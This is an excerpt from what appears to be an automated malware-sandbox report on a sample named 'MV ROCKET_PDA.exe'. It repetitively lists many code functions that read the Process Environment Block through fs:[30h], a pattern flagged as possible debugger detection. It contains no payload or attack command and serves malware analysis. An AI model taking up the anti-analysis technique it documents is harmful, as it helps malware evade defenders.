          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA9080 mov eax, dword ptr fs:[00000030h]1_2_00AA9080
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B23884 mov eax, dword ptr fs:[00000030h]1_2_00B23884
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B23884 mov eax, dword ptr fs:[00000030h]1_2_00B23884
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA58EC mov eax, dword ptr fs:[00000030h]1_2_00AA58EC
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]1_2_00AA40E1
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]1_2_00AA40E1
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]1_2_00AA40E1
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B3B8D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00B3B8D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B3B8D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B3B8D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B3B8D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B3B8D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]1_2_00AD002D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]1_2_00AD002D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]1_2_00AD002D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]1_2_00AD002D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]1_2_00AD002D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]1_2_00ABB02A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]1_2_00ABB02A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]1_2_00ABB02A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]1_2_00ABB02A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B74015 mov eax, dword ptr fs:[00000030h]1_2_00B74015
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B74015 mov eax, dword ptr fs:[00000030h]1_2_00B74015
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]1_2_00B27016
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]1_2_00B27016
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]1_2_00B27016
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B71074 mov eax, dword ptr fs:[00000030h]1_2_00B71074
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B62073 mov eax, dword ptr fs:[00000030h]1_2_00B62073
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC0050 mov eax, dword ptr fs:[00000030h]1_2_00AC0050
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC0050 mov eax, dword ptr fs:[00000030h]1_2_00AC0050
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]1_2_00B251BE
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]1_2_00B251BE
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]1_2_00B251BE
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]1_2_00B251BE
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD61A0 mov eax, dword ptr fs:[00000030h]1_2_00AD61A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD61A0 mov eax, dword ptr fs:[00000030h]1_2_00AD61A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]1_2_00B649A4
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]1_2_00B649A4
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]1_2_00B649A4
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]1_2_00B649A4
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B269A6 mov eax, dword ptr fs:[00000030h]1_2_00B269A6
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADA185 mov eax, dword ptr fs:[00000030h]1_2_00ADA185
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACC182 mov eax, dword ptr fs:[00000030h]1_2_00ACC182
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD2990 mov eax, dword ptr fs:[00000030h]1_2_00AD2990
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]1_2_00AAB1E1
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]1_2_00AAB1E1
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]1_2_00AAB1E1
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B341E8 mov eax, dword ptr fs:[00000030h]1_2_00B341E8
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]1_2_00AC4120
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]1_2_00AC4120
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]1_2_00AC4120
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]1_2_00AC4120
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC4120 mov ecx, dword ptr fs:[00000030h]1_2_00AC4120
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD513A mov eax, dword ptr fs:[00000030h]1_2_00AD513A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD513A mov eax, dword ptr fs:[00000030h]1_2_00AD513A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]1_2_00AA9100
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]1_2_00AA9100
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]1_2_00AA9100
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAC962 mov eax, dword ptr fs:[00000030h]1_2_00AAC962
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAB171 mov eax, dword ptr fs:[00000030h]1_2_00AAB171
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAB171 mov eax, dword ptr fs:[00000030h]1_2_00AAB171
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACB944 mov eax, dword ptr fs:[00000030h]1_2_00ACB944
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACB944 mov eax, dword ptr fs:[00000030h]1_2_00ACB944
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]1_2_00AA52A5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]1_2_00AA52A5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]1_2_00AA52A5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]1_2_00AA52A5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]1_2_00AA52A5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABAAB0 mov eax, dword ptr fs:[00000030h]1_2_00ABAAB0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABAAB0 mov eax, dword ptr fs:[00000030h]1_2_00ABAAB0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADFAB0 mov eax, dword ptr fs:[00000030h]1_2_00ADFAB0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADD294 mov eax, dword ptr fs:[00000030h]1_2_00ADD294
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADD294 mov eax, dword ptr fs:[00000030h]1_2_00ADD294
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD2AE4 mov eax, dword ptr fs:[00000030h]1_2_00AD2AE4
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD2ACB mov eax, dword ptr fs:[00000030h]1_2_00AD2ACB
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE4A2C mov eax, dword ptr fs:[00000030h]1_2_00AE4A2C
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE4A2C mov eax, dword ptr fs:[00000030h]1_2_00AE4A2C
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6AA16 mov eax, dword ptr fs:[00000030h]1_2_00B6AA16
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6AA16 mov eax, dword ptr fs:[00000030h]1_2_00B6AA16
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB8A0A mov eax, dword ptr fs:[00000030h]1_2_00AB8A0A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC3A1C mov eax, dword ptr fs:[00000030h]1_2_00AC3A1C
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]1_2_00AA5210
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA5210 mov ecx, dword ptr fs:[00000030h]1_2_00AA5210
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]1_2_00AA5210
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]1_2_00AA5210
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAAA16 mov eax, dword ptr fs:[00000030h]1_2_00AAAA16
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAAA16 mov eax, dword ptr fs:[00000030h]1_2_00AAAA16
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE927A mov eax, dword ptr fs:[00000030h]1_2_00AE927A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B5B260 mov eax, dword ptr fs:[00000030h]1_2_00B5B260
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B5B260 mov eax, dword ptr fs:[00000030h]1_2_00B5B260
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B78A62 mov eax, dword ptr fs:[00000030h]1_2_00B78A62
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6EA55 mov eax, dword ptr fs:[00000030h]1_2_00B6EA55
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B34257 mov eax, dword ptr fs:[00000030h]1_2_00B34257
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]1_2_00AA9240
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]1_2_00AA9240
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]1_2_00AA9240
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]1_2_00AA9240
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]1_2_00AD4BAD
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]1_2_00AD4BAD
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]1_2_00AD4BAD
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B75BA5 mov eax, dword ptr fs:[00000030h]1_2_00B75BA5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB1B8F mov eax, dword ptr fs:[00000030h]1_2_00AB1B8F
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB1B8F mov eax, dword ptr fs:[00000030h]1_2_00AB1B8F
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B5D380 mov ecx, dword ptr fs:[00000030h]1_2_00B5D380
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD2397 mov eax, dword ptr fs:[00000030h]1_2_00AD2397
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6138A mov eax, dword ptr fs:[00000030h]1_2_00B6138A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADB390 mov eax, dword ptr fs:[00000030h]1_2_00ADB390
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACDBE9 mov eax, dword ptr fs:[00000030h]1_2_00ACDBE9
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]1_2_00AD03E2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]1_2_00AD03E2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]1_2_00AD03E2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]1_2_00AD03E2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]1_2_00AD03E2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]1_2_00AD03E2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B253CA mov eax, dword ptr fs:[00000030h]1_2_00B253CA
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B253CA mov eax, dword ptr fs:[00000030h]1_2_00B253CA
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6131B mov eax, dword ptr fs:[00000030h]1_2_00B6131B
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AADB60 mov ecx, dword ptr fs:[00000030h]1_2_00AADB60
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD3B7A mov eax, dword ptr fs:[00000030h]1_2_00AD3B7A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD3B7A mov eax, dword ptr fs:[00000030h]1_2_00AD3B7A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AADB40 mov eax, dword ptr fs:[00000030h]1_2_00AADB40
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B78B58 mov eax, dword ptr fs:[00000030h]1_2_00B78B58
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAF358 mov eax, dword ptr fs:[00000030h]1_2_00AAF358
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB849B mov eax, dword ptr fs:[00000030h]1_2_00AB849B
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]1_2_00B26CF0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]1_2_00B26CF0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]1_2_00B26CF0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B614FB mov eax, dword ptr fs:[00000030h]1_2_00B614FB
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B78CD6 mov eax, dword ptr fs:[00000030h]1_2_00B78CD6
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADBC2C mov eax, dword ptr fs:[00000030h]1_2_00ADBC2C
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]1_2_00B61C06
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]1_2_00B26C0A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]1_2_00B26C0A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]1_2_00B26C0A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]1_2_00B26C0A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]1_2_00B7740D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]1_2_00B7740D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]1_2_00B7740D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC746D mov eax, dword ptr fs:[00000030h]1_2_00AC746D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3C450 mov eax, dword ptr fs:[00000030h]1_2_00B3C450
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3C450 mov eax, dword ptr fs:[00000030h]1_2_00B3C450
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADA44B mov eax, dword ptr fs:[00000030h]1_2_00ADA44B
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD35A1 mov eax, dword ptr fs:[00000030h]1_2_00AD35A1
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AD1DB5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AD1DB5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AD1DB5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B705AC mov eax, dword ptr fs:[00000030h]1_2_00B705AC
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B705AC mov eax, dword ptr fs:[00000030h]1_2_00B705AC
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]1_2_00AA2D8A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]1_2_00AA2D8A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]1_2_00AA2D8A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]1_2_00AA2D8A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]1_2_00AA2D8A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]1_2_00AD2581
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]1_2_00AD2581
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]1_2_00AD2581
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]1_2_00AD2581
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADFD9B mov eax, dword ptr fs:[00000030h]1_2_00ADFD9B
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADFD9B mov eax, dword ptr fs:[00000030h]1_2_00ADFD9B
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B58DF1 mov eax, dword ptr fs:[00000030h]1_2_00B58DF1
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABD5E0 mov eax, dword ptr fs:[00000030h]1_2_00ABD5E0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABD5E0 mov eax, dword ptr fs:[00000030h]1_2_00ABD5E0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B6FDE2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B6FDE2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B6FDE2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B6FDE2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]1_2_00B26DC9
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]1_2_00B26DC9
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]1_2_00B26DC9
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26DC9 mov ecx, dword ptr fs:[00000030h]1_2_00B26DC9
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]1_2_00B26DC9
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]1_2_00B26DC9
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B78D34 mov eax, dword ptr fs:[00000030h]1_2_00B78D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B2A537 mov eax, dword ptr fs:[00000030h]1_2_00B2A537
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6E539 mov eax, dword ptr fs:[00000030h]1_2_00B6E539
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]1_2_00AD4D3B
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]1_2_00AD4D3B
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]1_2_00AD4D3B
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAAD30 mov eax, dword ptr fs:[00000030h]1_2_00AAAD30
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
